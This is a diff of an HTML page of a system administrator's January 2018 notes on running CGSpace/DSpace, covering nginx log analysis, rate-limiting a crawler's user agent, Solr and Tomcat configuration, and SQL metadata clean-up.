<pre><code>$ grep -c &quot;Timeout: Pool empty.&quot; dspace.log.2018-01-10
<pre tabindex="0"><code>$ grep -c &#34;Timeout: Pool empty.&#34; dspace.log.2018-01-10
0
</code></pre><ul>
<li>The XMLUI logs show quite a bit of activity today:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &quot;10/Jan/2018&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &#34;10/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
951 207.46.13.159
954 157.55.39.123
1217 95.108.181.88
@ -587,18 +587,18 @@ $ http 'http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&amp;wt=js
</code></pre><ul>
<li>The user agent for the top six or so IPs are all the same:</li>
</ul>
<pre><code>&quot;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36&quot;
<pre tabindex="0"><code>&#34;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36&#34;
</code></pre><ul>
<li><code>whois</code> says they come from <a href="http://www.perfectip.net/">Perfect IP</a></li>
<li>I&rsquo;ve never seen those top IPs before, but they have created 50,000 Tomcat sessions today:</li>
</ul>
<pre><code>$ grep -E '(2607:fa98:40:9:26b6:fdff:feff:1888|2607:fa98:40:9:26b6:fdff:feff:195d|2607:fa98:40:9:26b6:fdff:feff:1c96|70.36.107.49|70.36.107.190|70.36.107.50)' /home/cgspace.cgiar.org/log/dspace.log.2018-01-10 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep -E &#39;(2607:fa98:40:9:26b6:fdff:feff:1888|2607:fa98:40:9:26b6:fdff:feff:195d|2607:fa98:40:9:26b6:fdff:feff:1c96|70.36.107.49|70.36.107.190|70.36.107.50)&#39; /home/cgspace.cgiar.org/log/dspace.log.2018-01-10 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
49096
</code></pre><ul>
<li>Rather than blocking their IPs, I think I might just add their user agent to the &ldquo;badbots&rdquo; zone with Baidu, because they seem to be the only ones using that user agent:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &quot;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari
/537.36&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &#34;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari
/537.36&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
6796 70.36.107.50
11870 70.36.107.190
17323 70.36.107.49
@ -608,13 +608,13 @@ $ http 'http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&amp;wt=js
</code></pre><ul>
<li>I added the user agent to nginx&rsquo;s badbots limit req zone but upon testing the config I got an error:</li>
</ul>
<pre><code># nginx -t
<pre tabindex="0"><code># nginx -t
nginx: [emerg] could not build map_hash, you should increase map_hash_bucket_size: 64
nginx: configuration file /etc/nginx/nginx.conf test failed
</code></pre><ul>
<li>According to nginx docs the <a href="https://nginx.org/en/docs/hash.html">bucket size should be a multiple of the CPU&rsquo;s cache alignment</a>, which is 64 for us:</li>
</ul>
<pre><code># cat /proc/cpuinfo | grep cache_alignment | head -n1
<pre tabindex="0"><code># cat /proc/cpuinfo | grep cache_alignment | head -n1
cache_alignment : 64
</code></pre><ul>
<li>On our servers that is 64, so I increased this parameter to 128 and deployed the changes to nginx</li>
@ -637,19 +637,19 @@ cache_alignment : 64
<li>Linode rebooted DSpace Test and CGSpace for their host hypervisor kernel updates</li>
<li>Following up with the Solr sharding issue on the dspace-tech mailing list, I noticed this interesting snippet in the Tomcat <code>localhost_access_log</code> at the time of my sharding attempt on my test machine:</li>
</ul>
<pre><code>127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;GET /solr/statistics/select?q=type%3A2+AND+id%3A1&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 107
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;GET /solr/statistics/select?q=*%3A*&amp;rows=0&amp;facet=true&amp;facet.range=time&amp;facet.range.start=NOW%2FYEAR-18YEARS&amp;facet.range.end=NOW%2FYEAR%2B0YEARS&amp;facet.range.gap=%2B1YEAR&amp;facet.mincount=1&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 447
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;GET /solr/admin/cores?action=STATUS&amp;core=statistics-2016&amp;indexInfo=true&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 76
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;GET /solr/admin/cores?action=CREATE&amp;name=statistics-2016&amp;instanceDir=statistics&amp;dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 63
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;GET /solr/statistics/select?csv.mv.separator=%7C&amp;q=*%3A*&amp;fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&amp;rows=10000&amp;wt=csv HTTP/1.1&quot; 200 2137630
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;GET /solr/statistics/admin/luke?show=schema&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 16253
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;POST /solr//statistics-2016/update/csv?commit=true&amp;softCommit=false&amp;waitSearcher=true&amp;f.previousWorkflowStep.split=true&amp;f.previousWorkflowStep.separator=%7C&amp;f.previousWorkflowStep.encapsulator=%22&amp;f.actingGroupId.split=true&amp;f.actingGroupId.separator=%7C&amp;f.actingGroupId.encapsulator=%22&amp;f.containerCommunity.split=true&amp;f.containerCommunity.separator=%7C&amp;f.containerCommunity.encapsulator=%22&amp;f.range.split=true&amp;f.range.separator=%7C&amp;f.range.encapsulator=%22&amp;f.containerItem.split=true&amp;f.containerItem.separator=%7C&amp;f.containerItem.encapsulator=%22&amp;f.p_communities_map.split=true&amp;f.p_communities_map.separator=%7C&amp;f.p_communities_map.encapsulator=%22&amp;f.ngram_query_search.split=true&amp;f.ngram_query_search.separator=%7C&amp;f.ngram_query_search.encapsulator=%22&amp;f.containerBitstream.split=true&amp;f.containerBitstream.separator=%7C&amp;f.containerBitstream.encapsulator=%22&amp;f.owningItem.split=true&amp;f.owningItem.separator=%7C&amp;f.owningItem.encapsulator=%22&amp;f.actingGroupParentId.split=true&amp;f.actingGroupParentId.separator=%7C&amp;f.actingGroupParentId.encapsulator=%22&amp;f.text.split=true&amp;f.text.separator=%7C&amp;f.text.encapsulator=%22&amp;f.simple_query_search.split=true&amp;f.simple_query_search.separator=%7C&amp;f.simple_query_search.encapsulator=%22&amp;f.owningComm.split=true&amp;f.owningComm.separator=%7C&amp;f.owningComm.encapsulator=%22&amp;f.owner.split=true&amp;f.owner.separator=%7C&amp;f.owner.encapsulator=%22&amp;f.filterquery.split=true&amp;f.filterquery.separator=%7C&amp;f.filterquery.encapsulator=%22&amp;f.p_group_map.split=true&amp;f.p_group_map.separator=%7C&amp;f.p_group_map.encapsulator=%22&amp;f.actorMemberGroupId.split=true&amp;f.actorMemberGroupId.separator=%7C&amp;f.actorMemberGroupId.encapsulator=%22&amp;f.bitstreamId.split=true&amp;f.bitstreamId.separator=%7C&amp;f.bitstreamId.encapsulator=%22&amp;f.group_name.split=true&amp;f.group_name.separator=%7C&amp;f.group_name.encapsulator=%22&amp;f.p_communities_name.split=true&amp;f.p_communities_name.separator=%7C&amp;f.p_communities_name.encapsulator=%22&amp;f.query.split=true&amp;f.query.separator=%7C&amp;f.query.encapsulator=%22&amp;f.workflowStep.split=true&amp;f.workflowStep.separator=%7C&amp;f.workflowStep.encapsulator=%22&amp;f.containerCollection.split=true&amp;f.containerCollection.separator=%7C&amp;f.containerCollection.encapsulator=%22&amp;f.complete_query_search.split=true&amp;f.complete_query_search.separator=%7C&amp;f.complete_query_search.encapsulator=%22&amp;f.p_communities_id.split=true&amp;f.p_communities_id.separator=%7C&amp;f.p_communities_id.encapsulator=%22&amp;f.rangeDescription.split=true&amp;f.rangeDescription.separator=%7C&amp;f.rangeDescription.encapsulator=%22&amp;f.group_id.split=true&amp;f.group_id.separator=%7C&amp;f.group_id.encapsulator=%22&amp;f.bundleName.split=true&amp;f.bundleName.separator=%7C&amp;f.bundleName.encapsulator=%22&amp;f.ngram_simplequery_search.split=true&amp;f.ngram_simplequery_search.separator=%7C&amp;f.ngram_simplequery_search.encapsulator=%22&amp;f.group_map.split=true&amp;f.group_map.separator=%7C&amp;f.group_map.encapsulator=%22&amp;f.owningColl.split=true&amp;f.owningColl.separator=%7C&amp;f.owningColl.encapsulator=%22&amp;f.p_group_id.split=true&amp;f.p_group_id.separator=%7C&amp;f.p_group_id.encapsulator=%22&amp;f.p_group_name.split=true&amp;f.p_group_name.separator=%7C&amp;f.p_group_name.encapsulator=%22&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 409 156
<pre tabindex="0"><code>127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/statistics/select?q=type%3A2+AND+id%3A1&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 107
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/statistics/select?q=*%3A*&amp;rows=0&amp;facet=true&amp;facet.range=time&amp;facet.range.start=NOW%2FYEAR-18YEARS&amp;facet.range.end=NOW%2FYEAR%2B0YEARS&amp;facet.range.gap=%2B1YEAR&amp;facet.mincount=1&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 447
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/admin/cores?action=STATUS&amp;core=statistics-2016&amp;indexInfo=true&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 76
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/admin/cores?action=CREATE&amp;name=statistics-2016&amp;instanceDir=statistics&amp;dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 63
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/statistics/select?csv.mv.separator=%7C&amp;q=*%3A*&amp;fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&amp;rows=10000&amp;wt=csv HTTP/1.1&#34; 200 2137630
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/statistics/admin/luke?show=schema&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 16253
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;POST /solr//statistics-2016/update/csv?commit=true&amp;softCommit=false&amp;waitSearcher=true&amp;f.previousWorkflowStep.split=true&amp;f.previousWorkflowStep.separator=%7C&amp;f.previousWorkflowStep.encapsulator=%22&amp;f.actingGroupId.split=true&amp;f.actingGroupId.separator=%7C&amp;f.actingGroupId.encapsulator=%22&amp;f.containerCommunity.split=true&amp;f.containerCommunity.separator=%7C&amp;f.containerCommunity.encapsulator=%22&amp;f.range.split=true&amp;f.range.separator=%7C&amp;f.range.encapsulator=%22&amp;f.containerItem.split=true&amp;f.containerItem.separator=%7C&amp;f.containerItem.encapsulator=%22&amp;f.p_communities_map.split=true&amp;f.p_communities_map.separator=%7C&amp;f.p_communities_map.encapsulator=%22&amp;f.ngram_query_search.split=true&amp;f.ngram_query_search.separator=%7C&amp;f.ngram_query_search.encapsulator=%22&amp;f.containerBitstream.split=true&amp;f.containerBitstream.separator=%7C&amp;f.containerBitstream.encapsulator=%22&amp;f.owningItem.split=true&amp;f.owningItem.separator=%7C&amp;f.owningItem.encapsulator=%22&amp;f.actingGroupParentId.split=true&amp;f.actingGroupParentId.separator=%7C&amp;f.actingGroupParentId.encapsulator=%22&amp;f.text.split=true&amp;f.text.separator=%7C&amp;f.text.encapsulator=%22&amp;f.simple_query_search.split=true&amp;f.simple_query_search.separator=%7C&amp;f.simple_query_search.encapsulator=%22&amp;f.owningComm.split=true&amp;f.owningComm.separator=%7C&amp;f.owningComm.encapsulator=%22&amp;f.owner.split=true&amp;f.owner.separator=%7C&amp;f.owner.encapsulator=%22&amp;f.filterquery.split=true&amp;f.filterquery.separator=%7C&amp;f.filterquery.encapsulator=%22&amp;f.p_group_map.split=true&amp;f.p_group_map.separator=%7C&amp;f.p_group_map.encapsulator=%22&amp;f.actorMemberGroupId.split=true&amp;f.actorMemberGroupId.separator=%7C&amp;f.actorMemberGroupId.encapsulator=%22&amp;f.bitstreamId.split=true&amp;f.bitstreamId.separator=%7C&amp;f.bitstreamId.encapsulator=%22&amp;f.group_name.split=true&amp;f.group_name.separator=%7C&amp;f.group_name.encapsulator=%22&amp;f.p_communities_name.split=true&amp;f.p_communities_name.separator=%7C&amp;f.p_communities_name.encapsulator=%22&amp;f.query.split=true&amp;f.query.separator=%7C&amp;f.query.encapsulator=%22&amp;f.workflowStep.split=true&amp;f.workflowStep.separator=%7C&amp;f.workflowStep.encapsulator=%22&amp;f.containerCollection.split=true&amp;f.containerCollection.separator=%7C&amp;f.containerCollection.encapsulator=%22&amp;f.complete_query_search.split=true&amp;f.complete_query_search.separator=%7C&amp;f.complete_query_search.encapsulator=%22&amp;f.p_communities_id.split=true&amp;f.p_communities_id.separator=%7C&amp;f.p_communities_id.encapsulator=%22&amp;f.rangeDescription.split=true&amp;f.rangeDescription.separator=%7C&amp;f.rangeDescription.encapsulator=%22&amp;f.group_id.split=true&amp;f.group_id.separator=%7C&amp;f.group_id.encapsulator=%22&amp;f.bundleName.split=true&amp;f.bundleName.separator=%7C&amp;f.bundleName.encapsulator=%22&amp;f.ngram_simplequery_search.split=true&amp;f.ngram_simplequery_search.separator=%7C&amp;f.ngram_simplequery_search.encapsulator=%22&amp;f.group_map.split=true&amp;f.group_map.separator=%7C&amp;f.group_map.encapsulator=%22&amp;f.owningColl.split=true&amp;f.owningColl.separator=%7C&amp;f.owningColl.encapsulator=%22&amp;f.p_group_id.split=true&amp;f.p_group_id.separator=%7C&amp;f.p_group_id.encapsulator=%22&amp;f.p_group_name.split=true&amp;f.p_group_name.separator=%7C&amp;f.p_group_name.encapsulator=%22&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 409 156
</code></pre><ul>
<li>The new core is created but when DSpace attempts to POST to it there is an HTTP 409 error</li>
<li>This is apparently a common Solr error code that means &ldquo;version conflict&rdquo;: <a href="http://yonik.com/solr/optimistic-concurrency/">http://yonik.com/solr/optimistic-concurrency/</a></li>
<li>Looks like that bot from the PerfectIP.net host ended up making about 450,000 requests to XMLUI alone yesterday:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &quot;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36&quot; | grep &quot;10/Jan/2018&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &#34;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36&#34; | grep &#34;10/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
21572 70.36.107.50
30722 70.36.107.190
34566 70.36.107.49
@ -659,25 +659,25 @@ cache_alignment : 64
</code></pre><ul>
<li>Wow, I just figured out how to set the application name of each database pool in the JNDI config of Tomcat&rsquo;s <code>server.xml</code>:</li>
</ul>
<pre><code>&lt;Resource name=&quot;jdbc/dspaceWeb&quot; auth=&quot;Container&quot; type=&quot;javax.sql.DataSource&quot;
driverClassName=&quot;org.postgresql.Driver&quot;
url=&quot;jdbc:postgresql://localhost:5432/dspacetest?ApplicationName=dspaceWeb&quot;
username=&quot;dspace&quot;
password=&quot;dspace&quot;
initialSize='5'
maxActive='75'
maxIdle='15'
minIdle='5'
maxWait='5000'
validationQuery='SELECT 1'
testOnBorrow='true' /&gt;
<pre tabindex="0"><code>&lt;Resource name=&#34;jdbc/dspaceWeb&#34; auth=&#34;Container&#34; type=&#34;javax.sql.DataSource&#34;
driverClassName=&#34;org.postgresql.Driver&#34;
url=&#34;jdbc:postgresql://localhost:5432/dspacetest?ApplicationName=dspaceWeb&#34;
username=&#34;dspace&#34;
password=&#34;dspace&#34;
initialSize=&#39;5&#39;
maxActive=&#39;75&#39;
maxIdle=&#39;15&#39;
minIdle=&#39;5&#39;
maxWait=&#39;5000&#39;
validationQuery=&#39;SELECT 1&#39;
testOnBorrow=&#39;true&#39; /&gt;
</code></pre><ul>
<li>So theoretically I could name each connection &ldquo;xmlui&rdquo; or &ldquo;dspaceWeb&rdquo; or something meaningful and it would show up in PostgreSQL&rsquo;s <code>pg_stat_activity</code> table!</li>
<li>This would be super helpful for figuring out where load was coming from (now I wonder if I could figure out how to graph this)</li>
<li>Also, I realized that the <code>db.jndi</code> parameter in dspace.cfg needs to match the <code>name</code> value in your applicaiton&rsquo;s context—not the <code>global</code> one</li>
<li>Ah hah! Also, I can name the default DSpace connection pool in dspace.cfg as well, like:</li>
</ul>
<pre><code>db.url = jdbc:postgresql://localhost:5432/dspacetest?ApplicationName=dspaceDefault
<pre tabindex="0"><code>db.url = jdbc:postgresql://localhost:5432/dspacetest?ApplicationName=dspaceDefault
</code></pre><ul>
<li>With that it is super easy to see where PostgreSQL connections are coming from in <code>pg_stat_activity</code></li>
</ul>
@ -685,24 +685,24 @@ cache_alignment : 64
<ul>
<li>I&rsquo;m looking at the <a href="https://wiki.lyrasis.org/display/DSDOC6x/Installing+DSpace#InstallingDSpace-ServletEngine(ApacheTomcat7orlater,Jetty,CauchoResinorequivalent)">DSpace 6.0 Install docs</a> and notice they tweak the number of threads in their Tomcat connector:</li>
</ul>
<pre><code>&lt;!-- Define a non-SSL HTTP/1.1 Connector on port 8080 --&gt;
&lt;Connector port=&quot;8080&quot;
maxThreads=&quot;150&quot;
minSpareThreads=&quot;25&quot;
maxSpareThreads=&quot;75&quot;
enableLookups=&quot;false&quot;
redirectPort=&quot;8443&quot;
acceptCount=&quot;100&quot;
connectionTimeout=&quot;20000&quot;
disableUploadTimeout=&quot;true&quot;
URIEncoding=&quot;UTF-8&quot;/&gt;
<pre tabindex="0"><code>&lt;!-- Define a non-SSL HTTP/1.1 Connector on port 8080 --&gt;
&lt;Connector port=&#34;8080&#34;
maxThreads=&#34;150&#34;
minSpareThreads=&#34;25&#34;
maxSpareThreads=&#34;75&#34;
enableLookups=&#34;false&#34;
redirectPort=&#34;8443&#34;
acceptCount=&#34;100&#34;
connectionTimeout=&#34;20000&#34;
disableUploadTimeout=&#34;true&#34;
URIEncoding=&#34;UTF-8&#34;/&gt;
</code></pre><ul>
<li>In Tomcat 8.5 the <code>maxThreads</code> defaults to 200 which is probably fine, but tweaking <code>minSpareThreads</code> could be good</li>
<li>I don&rsquo;t see a setting for <code>maxSpareThreads</code> in the docs so that might be an error</li>
<li>Looks like in Tomcat 8.5 the default URIEncoding for Connectors is UTF-8, so we don&rsquo;t need to specify that manually anymore: <a href="https://tomcat.apache.org/tomcat-8.5-doc/config/http.html">https://tomcat.apache.org/tomcat-8.5-doc/config/http.html</a></li>
<li>Ooh, I just saw the <code>acceptorThreadCount</code> setting (in Tomcat 7 and 8.5):</li>
</ul>
<pre><code>The number of threads to be used to accept connections. Increase this value on a multi CPU machine, although you would never really need more than 2. Also, with a lot of non keep alive connections, you might want to increase this value as well. Default value is 1.
<pre tabindex="0"><code>The number of threads to be used to accept connections. Increase this value on a multi CPU machine, although you would never really need more than 2. Also, with a lot of non keep alive connections, you might want to increase this value as well. Default value is 1.
</code></pre><ul>
<li>That could be very interesting</li>
</ul>
@ -711,15 +711,15 @@ cache_alignment : 64
<li>Still testing DSpace 6.2 on Tomcat 8.5.24</li>
<li>Catalina errors at Tomcat 8.5 startup:</li>
</ul>
<pre><code>13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxActive is not used in DBCP2, use maxTotal instead. maxTotal default value is 8. You have set value of &quot;35&quot; for &quot;maxActive&quot; property, which is being ignored.
13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxWait is not used in DBCP2 , use maxWaitMillis instead. maxWaitMillis default value is -1. You have set value of &quot;5000&quot; for &quot;maxWait&quot; property, which is being ignored.
<pre tabindex="0"><code>13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxActive is not used in DBCP2, use maxTotal instead. maxTotal default value is 8. You have set value of &#34;35&#34; for &#34;maxActive&#34; property, which is being ignored.
13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxWait is not used in DBCP2 , use maxWaitMillis instead. maxWaitMillis default value is -1. You have set value of &#34;5000&#34; for &#34;maxWait&#34; property, which is being ignored.
</code></pre><ul>
<li>I looked in my Tomcat 7.0.82 logs and I don&rsquo;t see anything about DBCP2 errors, so I guess this a Tomcat 8.0.x or 8.5.x thing</li>
<li>DBCP2 appears to be Tomcat 8.0.x and up according to the <a href="https://tomcat.apache.org/migration-8.html">Tomcat 8.0 migration guide</a></li>
<li>I have updated our <a href="https://github.com/ilri/rmg-ansible-public/commit/246f9d7b06d53794f189f0cc57ad5ddd80f0b014">Ansible infrastructure scripts</a> so that it will be ready whenever we switch to Tomcat 8 (probably with Ubuntu 18.04 later this year)</li>
<li>When I enable the ResourceLink in the ROOT.xml context I get the following error in the Tomcat localhost log:</li>
</ul>
<pre><code>13-Jan-2018 14:14:36.017 SEVERE [localhost-startStop-1] org.apache.catalina.core.StandardContext.listenerStart Exception sending context initialized event to listener instance of class [org.dspace.app.util.DSpaceWebappListener]
<pre tabindex="0"><code>13-Jan-2018 14:14:36.017 SEVERE [localhost-startStop-1] org.apache.catalina.core.StandardContext.listenerStart Exception sending context initialized event to listener instance of class [org.dspace.app.util.DSpaceWebappListener]
java.lang.ExceptionInInitializerError
at org.dspace.app.util.AbstractDSpaceWebapp.register(AbstractDSpaceWebapp.java:74)
at org.dspace.app.util.DSpaceWebappListener.contextInitialized(DSpaceWebappListener.java:31)
@ -761,15 +761,15 @@ Caused by: java.lang.NullPointerException
<li>Help Udana from IWMI export a CSV from DSpace Test so he can start trying a batch upload</li>
<li>I&rsquo;m going to apply these ~130 corrections on CGSpace:</li>
</ul>
<pre><code>update metadatavalue set text_value='Formally Published' where resource_type_id=2 and metadata_field_id=214 and text_value like 'Formally published';
delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like 'NO';
update metadatavalue set text_value='en' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(En|English)';
update metadatavalue set text_value='fr' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(fre|frn|French)';
update metadatavalue set text_value='es' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(Spanish|spa)';
update metadatavalue set text_value='vi' where resource_type_id=2 and metadata_field_id=38 and text_value='Vietnamese';
update metadatavalue set text_value='ru' where resource_type_id=2 and metadata_field_id=38 and text_value='Ru';
update metadatavalue set text_value='in' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(IN|In)';
delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(dc.language.iso|CGIAR Challenge Program on Water and Food)';
<pre tabindex="0"><code>update metadatavalue set text_value=&#39;Formally Published&#39; where resource_type_id=2 and metadata_field_id=214 and text_value like &#39;Formally published&#39;;
delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like &#39;NO&#39;;
update metadatavalue set text_value=&#39;en&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(En|English)&#39;;
update metadatavalue set text_value=&#39;fr&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(fre|frn|French)&#39;;
update metadatavalue set text_value=&#39;es&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(Spanish|spa)&#39;;
update metadatavalue set text_value=&#39;vi&#39; where resource_type_id=2 and metadata_field_id=38 and text_value=&#39;Vietnamese&#39;;
update metadatavalue set text_value=&#39;ru&#39; where resource_type_id=2 and metadata_field_id=38 and text_value=&#39;Ru&#39;;
update metadatavalue set text_value=&#39;in&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(IN|In)&#39;;
delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(dc.language.iso|CGIAR Challenge Program on Water and Food)&#39;;
</code></pre><ul>
<li>Continue proofing Peter&rsquo;s author corrections that I started yesterday, faceting on non blank, non flagged, and briefly scrolling through the values of the corrections to find encoding errors for French and Spanish names</li>
</ul>
@ -777,17 +777,17 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and
<ul>
<li>Apply corrections using <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a>:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2018-01-14-Authors-1300-Corrections.csv -f dc.contributor.author -t correct -m 3 -d dspace-u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-01-14-Authors-1300-Corrections.csv -f dc.contributor.author -t correct -m 3 -d dspace-u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>In looking at some of the values to delete or check I found some metadata values that I could not resolve their handle via SQL:</li>
</ul>
<pre><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='Tarawali';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value=&#39;Tarawali&#39;;
metadata_value_id | resource_id | metadata_field_id | text_value | text_lang | place | authority | confidence | resource_type_id
-------------------+-------------+-------------------+------------+-----------+-------+-----------+------------+------------------
2757936 | 4369 | 3 | Tarawali | | 9 | | 600 | 2
(1 row)
dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '4369';
dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = &#39;4369&#39;;
handle
--------
(0 rows)
@ -796,7 +796,7 @@ dspace=# select handle from item, handle where handle.resource_id = item.item_id
<li>Otherwise, the <a href="https://wiki.lyrasis.org/display/DSPACE/Helper+SQL+functions+for+DSpace+5">DSpace 5 SQL Helper Functions</a> provide <code>ds5_item2itemhandle()</code>, which is much easier than my long query above that I always have to go search for</li>
<li>For example, to find the Handle for an item that has the author &ldquo;Erni&rdquo;:</li>
</ul>
<pre><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='Erni';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value=&#39;Erni&#39;;
metadata_value_id | resource_id | metadata_field_id | text_value | text_lang | place | authority | confidence | resource_type_id
-------------------+-------------+-------------------+------------+-----------+-------+--------------------------------------+------------+------------------
2612150 | 70308 | 3 | Erni | | 9 | 3fe10c68-6773-49a7-89cc-63eb508723f2 | -1 | 2
@ -809,16 +809,16 @@ dspace=# select ds5_item2itemhandle(70308);
</code></pre><ul>
<li>Next I apply the author deletions:</li>
</ul>
<pre><code>$ ./delete-metadata-values.py -i /tmp/2018-01-14-Authors-5-Deletions.csv -f dc.contributor.author -m 3 -d dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./delete-metadata-values.py -i /tmp/2018-01-14-Authors-5-Deletions.csv -f dc.contributor.author -m 3 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Now working on the affiliation corrections from Peter:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2018-01-15-Affiliations-888-Corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p 'fuuu'
$ ./delete-metadata-values.py -i /tmp/2018-01-15-Affiliations-11-Deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-01-15-Affiliations-888-Corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p &#39;fuuu&#39;
